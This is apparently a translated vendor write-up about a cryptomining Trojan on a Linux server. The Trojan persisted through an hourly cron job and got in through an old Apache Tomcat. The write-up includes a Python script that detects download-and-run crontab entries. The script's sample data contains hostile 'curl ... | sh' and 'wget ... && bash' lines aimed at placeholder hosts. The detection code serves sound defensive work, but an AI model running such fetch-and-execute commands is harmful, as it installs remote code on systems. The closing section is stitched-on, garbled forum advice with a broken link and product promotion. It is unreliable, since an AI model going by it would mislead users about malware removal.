Web Mining vulnerability repair
A new customer recently consulted Sine Security, saying that his server often lags so badly that the website fails to open, and that remote connections to the server are extremely slow. Sometimes the ping value reaches 300-500, and it often fluctuates. Hearing this, one would generally conclude that he was being hit by mixed CC + DDoS traffic. Strangely, though, the data center showed no traffic attack. If it is not a traffic attack, yet the server still lags and the website fails to open, what kind of attack is it? To solve the customer's server lag, we immediately arranged for a security engineer to carry out security detection and deployment on his Linux server.
The mining Trojan is also designed to persist: if the customer forcibly stops the mining process, it starts again automatically and continues mining without interruption.
Careful inspection shows that it does this through an hourly scheduled task, which remotely downloads the shell mining Trojan and executes it. The script checks whether the mining process is currently running and, if not, starts the Trojan to mine.
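The persistence described above, an hourly scheduled task that downloads a shell script and runs it, leaves a recognisable trace in crontab files. The following Python script is an added example, not code from the original article or from Sine Security; it flags such entries, and the sample crontab, host names and function names are constructed for illustration.

```python
import re

# Constructed crontab content for illustration (hosts and paths are placeholders).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
MAILTO=""
15 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
0 * * * * curl -fsSL http://updates.example.invalid/a.sh | sh
@hourly wget -q -O /tmp/.x http://updates.example.invalid/b.sh && bash /tmp/.x
*/5 * * * * /opt/app/bin/healthcheck --quiet
30 2 * * 0 wget -q https://mirror.example.invalid/db.tar.gz -O /backup/db.tar.gz
"""

FETCH = re.compile(r"\b(curl|wget)\b")
# Fetched content handed to an interpreter: piped in, or run after the download.
EXECUTE = re.compile(r"\|\s*(ba|da|z)?sh\b|(&&|;)\s*((ba|da|z)?sh|chmod\s+\+x)\b")

def parse_entry(line):
    """Return (schedule, command) for a job line, or None for comments and env lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):
        parts = line.split(None, 1)
        return (parts[0], parts[1]) if len(parts) == 2 else None
    fields = line.split(None, 5)
    # A job needs five time fields plus a command; VAR=value lines do not qualify.
    if len(fields) < 6 or "=" in fields[0]:
        return None
    return " ".join(fields[:5]), fields[5]

def is_download_and_run(schedule, command):
    """True for a job that fires every hour (hour field '*') and fetches then executes."""
    hourly = schedule == "@hourly" or (
        not schedule.startswith("@") and schedule.split()[1] == "*")
    return bool(hourly and FETCH.search(command) and EXECUTE.search(command))

def suspicious_entries(crontab_text):
    """Return (line number, schedule, command) for each flagged crontab entry."""
    hits = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        entry = parse_entry(line)
        if entry and is_download_and_run(*entry):
            hits.append((number, *entry))
    return hits

if __name__ == "__main__":
    for number, schedule, command in suspicious_entries(SAMPLE_CRONTAB):
        print(f"line {number}: [{schedule}] {command}")
```

The check is limited to the hourly cadence the article describes; to review a real host, feed it the contents of each user's crontab and the files under `/etc/cron.d` and `/etc/cron.hourly`.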
A detailed security inspection was carried out on the client's Linux server. Fortunately, no server data had been encrypted, and there was no worm virus infection. If the data had been encrypted, the loss would have been great: the client runs a platform, and its data is very important. After the mining Trojan was found, the customer needed to know how the server had been attacked and how the Trojan had been uploaded, so that later attacks could be prevented.
Through security detection and analysis, our security engineers found that the server runs an Apache Tomcat environment and that the platform's architecture is JSP + Oracle database. The Apache Tomcat in use is a version from 2016, which is exposed to a serious Apache remote command execution vulnerability. Through this vulnerability, an intruder can directly compromise the server and obtain administrator privileges on it. The Sine Security engineer immediately repaired the Apache vulnerability and removed the Trojan. The problem is now solved: the client's server runs stably, and the website opens normally.
Antivirus. If you can't kill it, you can check for the program with high CPU or GPU occupation and manually delete it. If you can't, you can't change the hard disk (the disk where the mining program is located)... Change the computer
First of all, if it is a virus written by a rookie, you can find the file path in the task manager, directly terminate the process tree, or directly find the path and delete it.
Second, if the other party's technology is good enough that it is difficult for us to terminate the process, then we can download a computer housekeeper. The computer housekeeper now also has an increased scanning rate for mining viruses, and if it finds one, we can clean it directly.
Thirdly, if the computer housekeeper can't handle it, then we can check and kill with Avast. This program is the first in anti-virus, and it's like a sword for mining viruses.
Fourth, if we still suspect that there is a mining virus on the computer after using Avast, we first open the process and manually put the document path into the quarantine area.
Fifthly, after we put it in the isolation area, we use Avast's relaxation for analysis, and then send it to Avast's staff. If we suspect that it is a mining virus, the other party will give us manual analysis. If it is, the other party will also help us delete it.
Sixthly, if we still have doubts after being determined in our profession, if it's not Daniel, then my uncle will need to install the computer again. After all, everything is clear.
network experience: https://jingyan..com/article/ca41422f1d83601eae99edf3.html
Thank you (≥∇≦)
Open the task manager with Ctrl + Alt + Delete to see if there are any abnormal processes. Temporarily use CPU
In addition, you can download and install 360 Security Guard and turn on anti-mining protection to intercept effectively, and use the Trojan scan to check and kill comprehensively.